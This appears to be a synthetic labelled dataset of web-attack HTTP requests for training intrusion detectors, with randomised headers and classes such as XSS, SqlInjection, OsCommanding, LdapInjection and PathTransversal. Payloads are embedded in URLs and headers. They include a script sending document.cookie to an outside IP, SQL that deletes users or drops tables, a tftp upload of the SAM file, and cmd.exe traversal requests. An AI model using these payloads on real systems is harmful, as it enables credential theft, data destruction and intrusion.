Accept-Language: 3h8-decbiP;q=0.2, niTrheBs-sxp
Cache-Control: only-if-cached
Client-ip: 55.231.188.175
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="114"
Date: Sat, 26 Dec 09 20:42:54 CET
ETag: W/"@moOyA0qZvFXp@I"
Expect: eAae
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 22 Oct 05 03:31:29 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: *
Max-Forwards: 31
MIME-Version: 9.5
Pragma: aeEoOrek=4
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: NTLM ZWEyZW90dW1sYWVpaGVSZWdkb2VlZ2ZEaWN0aDN2YWVw
Range: 1030-
Referer: http://www.0tn1l.cz/qoWYhbh/luxohn.shtml
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: hxCSupE http://www.cwizw.de
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 5.1 www.eitose.png
Transfer-Encoding: compress
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40278
Start - Id: 48137
class: XSS
GET /s-PKhE8/o85.HZn3Q8E5Z/6vZmpKxlANNoUncJ/voyxBDv7CYr/rjt7eetsgthtA/nvMMD/o8Fzoq/i4-E2F3Svu48jWeD/ixhiframeS04QMh4-/cq9ogIpov7.shtml?plaaaetkiffnbu=%3Ca+href++%3D+++%22+++++about%3A%3Cs%26%2399%3Bript%3E%5Bwindow.open%28%27http%3A%2F%2F94.157.84.146%2Forieta.cfm%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E+++++%22++%3E HTTP/1.0
Host: 173.225.217.42
Connection: close
Accept: audio/basic;q=0.9, application/rtf, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Ohdisu='tilvl'
Client-ip: 34.160.166.92
Cookie: seqmiaqiij=8236194;az2r=mc5a;Gupdate6RX6emailD=fLe;kUQTieJ=l4iXjF.pCB
Cookie2: $Version="98"
Date: Wed, 07 Jan 09 15:05:02 GMT
ETag: W/"dP0f@L8t3uYSaQ2"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: "_sQzlgpRyjqlMrtJz"
Max-Forwards: 8
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic NGRuSDpjb3Rj
Range: 4-,0-614
Referer: /gono/eglan/tvgFE.gif
TE: trailers,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 0.2; sk-0u; rv:5.9.8) Gecko/71265577
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: identity
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48137
Start - Id: 42537
class: SqlInjection
GET /uM6QmGo3wm/gWUy_0JUmhlb/a7cCU/12/nwizp/sahnatss6epu/3fpie0/eFuHP/1ApgSqrcmdH.gif?beor=32&e9j=tNnt&agnneirugrinsfe=ossbiahfahhblee7&vgg16t=%27++++%29%3B+delete++++from+users%3B++commit%3B++dummy%28%27 HTTP/1.1
Host: www.vDiyshJtro.st:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 222.72.99.22
Cookie: boomtieotjeie=32870588;nrnntl=ta;PzliRt=b63
Cookie2: $Version="76"
Date: Sat, 28 Jun 08 02:44:30 GMT
ETag: "YaiKF0rmASDK-26T"
Expect: 100-continue
From: bs1as@pton6i0pc.org
If-Modified-Since: Sat, 26 Nov 05 21:59:05 GMT
If-Unmodified-Since: Tue, 21 Apr 09 01:33:47 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: mhmVs bt6gEeii=goImfere
Authorization: Digest algorithm=MD5
Range: 79786-446
Referer: http://www.ei1eon.uk/lcFpee.txt
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: 4tnpe6biA
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 3.9 www.inolmAu.css, 9.6 162.16.131.228, 0.4 www.ss3o.jpg
Transfer-Encoding: compress
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 080 122.26.58.92 "S5IseRilndhbniaya" "Sat, 05 May 07 24:34:31 UTC"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42537
Start - Id: 44575
class: OsCommanding
GET /oclgidinaA1ao0c5/me81V4.mspx?ajR50dDHS3Q=83&acybatankSx6edH=250.115.226.36+++++%7Ctftp+++-i+++++254.225.35.227+PUT+sam._&ia1en3c5tule99=9988247&tonzeL=d6H1v HTTP/1.1
Host: www.ttevurdwo.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 164.152.31.227
Cookie: oD=tu-;rHD4servicesGX2=tl3tT 1e;syey=toaocang
Date: Tue, 04 Sep 07 24:59:50 GMT
From: ne1pNm@taromiNse.be
If-Modified-Since: Thu, 11 May 06 09:10:30 UTC
If-Unmodified-Since: Thu, 23 Jun 05 23:31:57 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 2380
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bnhhaXNPeWxoTjJPdW92aGVpRG5mb1Vhc3VzZTNDc0U=
Referer: /16d5ilts/RfRomrRn/nurmi.cgi
TE: trailers,trailers,chunked
User-Agent: berals
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: gzip
Upgrade: 93A/7.1, Vd8/3.3, stara7/6.4
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44575
Start - Id: 36538
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.frxXiEk.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-roman, iso-8859-8-i, x-mac-korean;q=0.3, x-mac-korean;q=0.5, x-mac-hebrew;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Mon, 31 Jan 05 02:52:35 GMT
ETag: "@ruI.MWKdtelCCfg"
Expect: 9nww
From: qslOdEWa@reveTya6.com
If-Modified-Since: Fri, 05 Aug 05 18:06:02 UTC
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "HWXspFdFV_utEpAEBu"
If-Range: *
Max-Forwards: 848
MIME-Version: 3.0
Pragma: n0=Fqvn
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: Digest cnonce="ZGoncb"
Range: 9206-,968-
Referer: http://www.ityil.biz/ipoaobs.gif
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 7.9; lN-ev; rv:2.0.0) Gecko/79315508
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 547x5195
Via: 1.7 184.212.133.237
Transfer-Encoding: compress
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36538
Start - Id: 38773
class: LdapInjection
GET /HX.iunlink/xiit7tD/aeeoeacaentenrjgiomi/.0aXgpassthrupkw7sav0-/nullXHuC59R-5qImocha/nnhOwf/Ko-S-gICG@QI/IJMy7e/evH_X-3ale/1nRatonlnnt.asmx?urazysz=caaeoginsertrr&aln=cusbody&le=72%29%28%26%28objectClass%3Dfst%29%28%7C%28sn%3D+no%29%28cn%3DA++++J*%29%29&Ates=eKu.2Ta4X&Ha6xybAvyh0=669455428&wuhniareprt8eol=eA6r%3Ctomu&nqe1enwt7yue=nUR6._rzKS&1ostneet=oaccess_logbgsoundatsze1m&4lzm16n=4249422&ErnhtadetpdseX0=s&yeq=%3B%2FeErdaRdand%5Ctnh&soa=572 HTTP/1.0
Host: www.i5isateS4.biz:80
Connection: keep-alive
Accept: text/*, text/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 141.187.117.244
Cookie: gelBcUawttio=lbUer7shutdownrzsli;wlttginlnr=8705974;seoEafy5oachk4r=c7C@saK;otj=nei
Cookie2: $Version="379"
Date: Thu, 08 Oct 09 09:50:48 GMT
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Thu, 25 Jan 07 11:01:47 GMT
If-Unmodified-Since: Wed, 21 Oct 09 22:55:20 UTC
If-Match: *
If-None-Match: "@-G7TJ.Pir-I_hnKbEs"
If-Range: *
Max-Forwards: 268
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /d3yeuo/aed8/ulxrtAtn.gz
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/5.4 (X11; U; Linux i586 3.2; ng-yx; rv:7.5.1) Gecko/35739414
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: deflate
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 253.134.222.74
X-Serial-Number: 323337935267147
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38773
Start - Id: 37251
class: LdapInjection
GET /mAnlrshOjgedawOaidfk/e.CT8tR3Ys.JFRcgK/ncf@eQdLM9/m1UgBdrop4wNxp_7asam/orKBGjsR-/nd5xetcuFXDcfzliL6z-/saQEr9-lFpAHs2KkP/eNlncjh/AoptPZqXJ/aisercutcegnr/riq@@PpZNg2tX7.tiff?yalq=775406&todlueVnl0ptuic=6N-hgWn3S&hK=7selEhnida3r0dio&3n60pAists2e=l6boot.iniformini%3Baitsisasamkeo&ohuaehp=Ip%29%28%26%28objectClass++%3D++eS*%29&9hhlrsahsautcdt=aicxnstguedttZ HTTP/1.0
Host: 183.192.53.92:4
Connection: ihnteXt
Accept: application/rtf, text/*
Accept-Charset: windows-1257;q=0.9, big5, windows-1251;q=0.1, iso-8859-8
Accept-Encoding: gzip
Accept-Language: o-rrutanig, nt-7civh;q=0.1
Cache-Control: max-stale
Client-ip: 112.64.200.186
Cookie: iteurchmv=oe3;mmeotsbuces=or\4rwnwet
Cookie2: $Version="9"
Date: Mon, 09 Apr 07 09:20:53 GMT
ETag: "FqvLv4MfI6ZEr9M4"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Match: *
If-None-Match: "1y5S9ElnJXoorOnIe"
If-Range: Tue, 11 Oct 05 12:40:49 GMT
Max-Forwards: 386
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: NTLM TndxVDd6ZE5odnRtbXM5N29hMmdhNG5vY291bnR5b2VnaGJn
Authorization: NTLM bmVyb250OTFwZndza210b3duc2hwZGNtdHh3MnJoeHRlcw==
Referer: http://www.dhrhpr.st/8eis4.png
Trailer: Warning
User-Agent: Mozilla/5.4 (X11; U; Open BSD i386 8.6; na-ev; rv:2.8.2) Gecko/29603161
UA-CPU: 68000
UA-Color: color8
UA-Pixels: 1371x144
Via: 7.7 41.14.138.77, 2.8 232.32.4.132
Transfer-Encoding: compress
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37251
Start - Id: 42930
class: OsCommanding
GET /xf.gif?ehtOt=au%2FdAmc&hnriqy=abxhyefeufaL&tesu=69470 HTTP/1.1
Host: 17.79.122.92
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-korean
Accept-Encoding: rm     -f   /tmp/aihii   |
Accept-Language: t-aehbS, nsl68tou-oac, 2Gnp-Dc6ocanh, Mh-s;q=0.1
Cache-Control: no-cache
Cookie: tas=30469679;eiia9=04164124
Date: Sun, 14 Aug 05 11:44:34 CET
Expect: 100-continue
If-Modified-Since: Sat, 28 Oct 06 13:45:22 CET
If-Unmodified-Since: Thu, 11 Feb 10 06:27:30 CET
If-Match: "jcx3dhyJdbjevlEa6"
If-Range: Sun, 28 Jun 09 19:11:06 GMT
Max-Forwards: 42
Pragma: no-cache
Authorization: NTLM dGVvd2Rld2VjYXM5cjF1eWRpdG5ydGViQmdzaWh5bnczc3ludVJF
Range: 01418-88080,370072-
Referer: /tv0xkt/zbve/asoelh/tdoWele0.js
Trailer: Pragma
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 6.1; hm-ts; rv:3.9.5) Gecko/29850860
UA-CPU: PowerPC
UA-Pixels: 3935x809
Via: HTTP/0.9 189.2.57.107, 7.2 27.16.20.0:786
Transfer-Encoding: identity

null

End - Id: 42930
Start - Id: 47645
class: XSS
GET /qFzLNOOv8/pourltFodcmvew/nlTdetiyxsscts1sroha/bHb.MCd9B/diio/ooI1/KHB9httpsgZ/rjHass5ftaeupa/_FGiPchilds4input5F/6gaHHBsfg5i24/pVlC8@lXS35qpSyqYAJC/30eweoritn.pl?pse=nt&ki3pee=s&ooo=nmtaafs6efeEoee&ear=593&tsSusoz=79965162&0home8-nodeHB9Ds4U=ic7-&dik8=9109327497&lestirhaede=%3Cdiv+style+%3D%22behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.trreis.com%2Fscript%2Fth.asp%5D%29%3B++++%22+%3E&rcePhcvOimzmr=93683587&execIPvPctmT5Y=r6evvMisrt&40Kwznrneap=525&ZSz7KN=5554245 HTTP/1.1
Host: 130.69.148.41
Connection: close
Accept: text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.8, gzip;q=0.3, identity, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 168.210.69.11
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="2"
Date: Sat, 23 Aug 08 02:57:04 CET
ETag: W/"KeyKdGthDghEQTc"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 18 Feb 08 20:26:39 CET
If-Unmodified-Since: Thu, 04 Oct 07 10:51:13 CET
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: "lFZ0gggcJ8dQ6@gQ"
Max-Forwards: 2
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM Z25lb29zZTBldGdoZW90aGM0aXB0Y25ubjF1bml4aDhsZ3Q=
Authorization: 8enqaa 6lleisvy=nhdr
Range: 51-,059585-
Referer: /onei7.php4
TE: trailers,deflate;q=0.3,trailers
Trailer: Via
User-Agent: sAletnhweoct
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: gzip
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47645
Start - Id: 36880
class: LdapInjection
GET /tir6nudro6a/hU49/asgsxoAn4f/aeOdu.mdb?oesaueed=rnu%7C+se8+r4lqo&htrhapegMduwl=rrne%24iatpt&60@GtTcf=0083137&grlsFhnthnr52=0ahnr%7Capas&ihtxno=01&mtgtgcci=eqVDy-p28eR&hsfoe7siAshs=input6&tukuhenVH=ihe%2Fpc&a2fmrcceuih4n=neaoIo&gx7m=9&4-vbscriptgQ=8328&om1hi=%3FsxciikF2t%3Fhttpn2%27&OymlomendAde=otneo HTTP/1.0
Host: 44.202.96.237
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: he-jdro, sDT-nrido00h
Cache-Control: no-store
Client-ip: 154.207.127.41
Cookie: ohnaiMqn6isr=5i8gy)( |    (ae=*);gf7rue=t7qXE
Cookie2: $Version="0"
Date: Sat, 26 Dec 09 21:58:03 CET
ETag: "58gU5qryzi_xKprDb50"
Expect: 100-continue
From: hlie@ettef.de
If-Modified-Since: Fri, 09 Dec 05 07:53:09 CET
If-Unmodified-Since: Mon, 22 Mar 10 23:08:40 CET
If-Match: "zYRRM7EqLEIO8OMr"
If-None-Match: *
If-Range: *
Max-Forwards: 454
MIME-Version: 1.2
Pragma: srOc=aigi
Proxy-Authorization: tittt SszhsJl=itA3crq
Authorization: Basic cmFuZWVUOmVtaXdo
Range: -348635
Referer: /isog/zbteptu/sqmint/RDtiL.txt
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.9 (Windows; U; WinNT 9.7; et-4s; rv:9.0.3) Gecko/27370006
UA-Disp: 1108,5014,32
UA-OS: Win9x
UA-Pixels: 5144x8238
Via: HTTP/0.3 www.Ao4snmah.tiff, FTP/1.5 96.238.82.134
Transfer-Encoding: gzip
Upgrade: nrT/9.9
Warning: 328 71.142.30.136:77389 "ttnaaextoqsiIoo" "Fri, 15 May 09 15:18:30 CET"
X-Serial-Number: 0500322312
----: ------------------------------------------

null

End - Id: 36880
Start - Id: 45870
class: PathTransversal
GET /vB7etc.html?serelh=eeDh.5vInUo&54tt=to&ZmxtermNINHQA=tcio%27z&tnadeEtnqOsai=02932&domaxhyjdnelc=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: 21.142.130.54
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 150.255.125.182
Cookie: hy6eohSai=64010;un=970201;rhrlosQc4itbxo=lad9f\scriptaEapLiy;erfeneloihdgato=eet7d;enr5=lbs
Cookie2: $Version="9"
Date: Sun, 14 Dec 08 04:38:23 GMT
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: ofnyan@esdcimRn.ch
If-Modified-Since: Wed, 03 Nov 04 05:21:07 UTC
If-Unmodified-Since: Sat, 10 Sep 05 08:06:17 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Jul 06 21:48:13 UTC
Max-Forwards: 587
MIME-Version: 5.3
Pragma: hulinc8='tas2c6e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: NTLM dHRwZ3RnbnJUZWloZXlsbnJvZzd0bWNFdWI2YWQwaGlDNGU=
Range: 81947-,357703-
Referer: http://adyL.uk/ladimdy/sonqr/snl7te.pl
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: idas7ztnSwohA
UA-CPU: MIPS
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: FTP/5.1 www.t4wqkngc.gif, 2.2 189.183.98.129, 2.9 67.15.176.169
Transfer-Encoding: nerloe; tskaOnc=tsqll
Upgrade: impc/6.7
Warning: 645 115.27.59.90:9013 "qanewiWttmahnnlyit1n" "Thu, 03 Mar 05 21:14:02 GMT"
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 61308570883843
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45870
Start - Id: 42134
class: SqlInjection
GET /bhXshutdownE06u6wttmpzh/xvPcKOTuaVib/dCyfTnpeHrhZh_kT_--B/t-XHos7v/ta/u3q.updatewKhRF.X/nR9EcOyZi/x_gJNrnph-WrcpfromG9/3uDMix0Q4j/M3Ud/pBpfdh.U73o9kRG4.htm?fuuuieoaioeprtm=55386628&9cPxtermqb4T23_=%27%3B+drop++table+admin&vfiaspNre=o5+zvdaeteincluderxnt%3Eh HTTP/1.1
Host: www.Nrnuen1x.de:4
Connection: asse
Accept: text/*;q=0.2, application/*;q=0.4, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: Ml2tar='rl'
Client-ip: 56.112.127.62
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="9"
Date: Wed, 17 Mar 04 04:38:40 GMT
ETag: "0001eTV1fhWM6qkm"
Expect: ahiWkN=nO6ei
From: yaieolw@dAieet.st
If-Modified-Since: Wed, 19 Oct 05 09:49:50 GMT
If-Unmodified-Since: Fri, 25 May 07 19:18:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 465
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="nLrhAD"
Range: 80-3804,023297-91,09-
Referer: /a4olyi/r3nme/lyrtswoe.bin
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/4.0 (X11; U; Linux i386 3.1; ii-8s; rv:0.4.8) Gecko/53711431
UA-CPU: StrongARM
UA-Disp: 1126,087,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 4.7 194.221.73.223
Transfer-Encoding: compress
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42134
Start - Id: 43875
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 175.91.99.180
Connection: xsowpeEr
Accept: */*
Accept-Charset: windows-1255;q=0.1, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Thu, 14 Jul 05 09:19:20 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sun, 29 Feb 04 24:28:01 CET
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 3807
MIME-Version: 1.9
Pragma: Abe9re4='w'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: NTLM ZDAxdXJzdDVldThvZWVuc25vbU04dWFldWF0YWE1enFjZw==
Range: 40517-,9-9675
Referer: http://www.5sE5o.fr/nkdoiw/smas/kitm.gif
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: l8@ONnRrD http://www.osea8.org
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: gzip
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 3781444141
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43875
Start - Id: 43728
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.0wRoOorszl.ch:80
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 216.86.105.67
Cookie: mlphva6t=e8LuepstoIvis;t3ogh9y4prd=bpftifeycIc;Sr=fvgpesm
Cookie2: $Version="6"
Date: Fri, 25 May 07 07:54:57 CET
ETag: "RPxc1_n2Ps@ZDg3I"
Expect: eiy7a
From: uhbqiisi@rmieagr.org
If-Modified-Since: Wed, 25 Oct 06 07:12:10 UTC
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "jHIL3cf8xKPp@wU"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 1
MIME-Version: 8.3
Pragma: sijqefae=ooth3cs
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM aHRrZmIxbWlzY09pY2xhbHd0dG9qbXQ5ZWE3a2xtdDRPbWU=
Range: 7008-71
Referer: /uaue/h0tnnhs/jnnewes.fgf
TE: chunked,trailers,chunked;q=0.3
User-Agent: Mozilla/8.0 (compatible; dwn8; WinNT; iterttRa; tit6fcc0; r4focinnh)
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: kilOte; sCgne=gsno
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43728
Start - Id: 46743
class: XSS
GET /iydsni/6M0@9PrmAt7t/rrn/y_dcDUb7JC4YKAI8/ohoedenu/1oTlambyn/tqD/e8vC/tty0heasatiH/tOP/i_q935ys.5UsFw.sh?D8TWNWlocationlKqc=7843&88exechtaccesO6UYLN=a+tm&e9tas5e=h28068Q&pbs=aceafnsohuExe&twdz6s3dil=%3D7eoa6lscript0sdbesj&esiumno2USe=s8memee59 HTTP/1.0
Host: 24.135.245.123:2775
Connection: pteo
Accept: audio/basic, application/postscript;q=0.8
Accept-Encoding: gzip, deflate, gzip;q=0.8, deflate;q=0.7
Accept-Language: *;q=0.0
Client-ip: 68.64.40.48
Cookie: oreob=-d@;eu2wsas8rTi5e=<img   src   =    "    sendat >"   onmouseover  =   "   [alert('sxo');]    "  >;Wzjzunph-D_ukP=eGHz0TQ;iste=0924729;ooihohpsf=\e;eeessrr=qs
Date: Sat, 23 Dec 06 06:20:29 CET
If-None-Match: "6@cS-3tIIV7fXO9zkx"
Authorization: Digest nc=B2fd48f8
Referer: /cYhrh/ihO0t7.sh
User-Agent: etlotl/3.1.5
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46743
Start - Id: 37399
class: LdapInjection
GET /nQcmdqdTSt-/op/aY.P/Uigt/c5s/tdH5/agc/KXg5fG4U/UA8a/lEltfa0iD.htm?tf=1441720&hA6tnrHwoArtrr=4081542 HTTP/1.1
Host: 51.113.33.201
Connection: close
Accept: text/*;q=0.9, image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.6, compress;q=0.2, compress, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 129.32.184.202
Cookie: piCaPd=11348005;A6.kl.MK=o%Ec;ohprb=jen0e)( |  (3c7=*)
Cookie2: $Version="12"
Date: Fri, 23 Apr 04 22:52:40 CET
ETag: W/"ntUFozWjwKZ6oRR"
Expect: eeawuhq9
From: boile3ls@wovnoatoto.net
If-Unmodified-Since: Fri, 10 Aug 07 06:28:06 GMT
If-None-Match: *
If-Range: Sun, 25 Jul 04 05:19:37 UTC
Max-Forwards: 37
